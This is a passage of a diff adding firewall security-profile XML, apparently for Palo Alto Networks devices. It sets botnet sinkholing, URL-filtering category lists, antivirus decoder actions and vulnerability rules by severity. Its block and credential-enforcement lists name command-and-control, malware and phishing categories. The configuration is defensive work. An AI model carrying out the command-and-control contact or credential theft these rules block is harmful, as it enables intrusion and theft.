+                  </lists>
+                  <packet-capture>extended-capture</packet-capture>
+                  <sinkhole>
+                    <ipv4-address>pan-sinkhole-default-ip</ipv4-address>
+                    <ipv6-address>::1</ipv6-address>
+                  </sinkhole>
+                </botnet-domains>
+                <rules>
+                  <entry name="Drop">
+                    <action>
+                      <drop/>
+                    </action>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                </rules>
+                <threat-exception>
+                  <entry name="14984">
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                </threat-exception>
+              </entry>
+            </spyware>
+            <url-filtering>
+              <entry name="Outbound-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>high</log-severity>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                    <member>White-List</member>
+                  </block>
+                </credential-enforcement>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <action>block</action>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>command-and-control</member>
+                  <member>hacking</member>
+                  <member>malware</member>
+                  <member>phishing</member>
+                  <member>Black-List</member>
+                </block>
+              </entry>
+              <entry name="Alert-Only-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>medium</log-severity>
+                  <alert>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                  </alert>
+                </credential-enforcement>
+                <action>block</action>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>hacking</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>malware</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>phishing</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                </alert>
+              </entry>
+              <entry name="Exception-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>high</log-severity>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                  </block>
+                </credential-enforcement>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <action>block</action>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>command-and-control</member>
+                  <member>hacking</member>
+                  <member>malware</member>
+                  <member>phishing</member>
+                  <member>Black-List</member>
+                </block>
+              </entry>
+              <entry name="Cloud-Workloads">
+                <credential-enforcement>
+                  <mode>
+                    <disabled/>
+                  </mode>
+                  <log-severity>medium</log-severity>
+                  <alert>
+                    <member>White-List</member>
+                  </alert>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                    <member>Custom-No-Decrypt</member>
+                  </block>
+                </credential-enforcement>
+                <action>block</action>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-container-page-only>no</log-container-page-only>
+                <alert>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>command-and-control</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>hacking</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>malware</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>phishing</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>Black-List</member>
+                  <member>Custom-No-Decrypt</member>
+                </block>
+              </entry>
+              <entry name="Cloud-AlertAll">
+                <credential-enforcement>
+                  <mode>
+                    <disabled/>
+                  </mode>
+                  <log-severity>medium</log-severity>
+                  <allow>
+                    <member>Black-List</member>
+                    <member>Custom-No-Decrypt</member>
+                    <member>White-List</member>
+                  </allow>
+                </credential-enforcement>
+                <action>block</action>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-container-page-only>no</log-container-page-only>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>command-and-control</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>hacking</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>malware</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>phishing</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>Black-List</member>
+                  <member>Custom-No-Decrypt</member>
+                  <member>White-List</member>
+                </alert>
+              </entry>
+            </url-filtering>
+            <virus>
+              <entry name="Alert-Only-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Outbound-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Inbound-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Internal-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Exception-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+                <description>Use this profile for rules needing modifications to the standard</description>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <decoder>
+                  <entry name="ftp">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                </decoder>
+                <packet-capture>yes</packet-capture>
+              </entry>
+            </virus>
+            <vulnerability>
+              <entry name="Outbound-VP">
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-VP">
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-VP">
+                <rules>
+                  <entry name="Block-Critical-High">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Medium-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-VP">
+                <rules>
+                  <entry name="Alert-All">
+                    <action>
+                      <alert/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Exception-VP"/>
+              <entry name="Cloud-Recommended">
+                <rules>
+                  <entry name="Drop">
+                    <action>
+                      <drop/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
